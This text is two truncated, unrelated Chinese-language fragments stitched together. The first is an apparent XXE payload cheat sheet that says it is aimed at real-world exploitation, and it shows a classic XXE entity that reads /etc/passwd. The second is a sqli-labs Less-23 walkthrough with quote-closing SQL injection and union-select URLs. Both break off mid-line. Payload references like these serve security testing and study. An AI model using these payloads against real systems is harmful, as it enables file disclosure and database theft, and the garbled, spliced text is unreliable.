前言 关于XXE相关的一些payload的总结记录,更侧重于实战直接拿来测试利用,而非CTF绕WAF。。。 Classic XXE <?xml version="1.0"?><!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data> 可读文
T23 单引号闭合 --+ #过滤 所以可以尝试补全的方法 127.0.0.1/sqli-labs/Less-23/?id=1' or '1'='1127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,2,3 or '1'='1127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,da